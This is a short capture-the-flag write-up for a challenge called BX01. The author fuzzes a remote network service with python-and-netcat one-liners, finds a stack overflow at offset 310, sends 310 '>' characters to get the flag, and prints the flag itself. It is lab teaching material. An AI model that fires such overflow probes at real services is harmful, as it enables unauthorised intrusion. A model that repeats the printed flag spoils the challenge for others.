BX01 - 1000pts

Briefing

Access the network service at url: cfta-bx01.allyourbases.co and port: 8012 and find a way to get the flag by formatting a valid request.

I completely overthought this problem I was trying advanced buffer overflow techniques (trying to get past a canary, etc) when the valid request is actually pretty simple.
I start by testing if the service is vulnerable to a buffer overflow: python -c "print('a'*700)" | nc cfta-bx01.allyourbases.co 8012
```
 Processing request...
 Exception: angle brackets not terminated.
 *** stack smashing detected ***
```
Looks like it is vulnerable.
I wrote a simple pwntools Python script to try some possible offsets and found the overflow to happen at 311, so the offset is 310.
python -c "print('a'*310)" | nc cfta-bx01.allyourbases.co 8012 simply outputs:
```
 Processing request...
 Exception: angle brackets not terminated.
```
We can send 310 >s instead of as to terminate the angle brackets and get the flag: python -c "print('>'*310)" | nc cfta-bx01.allyourbases.co 8012:
```
 Processing request...
 Exception: angle brackets not terminated.
 Request successful.

 Flag: AlOnGSeaRcHFoROverWriTe
```

AlOnGSeaRcHFoROverWriTe

Last updated 4 years ago

Was this helpful?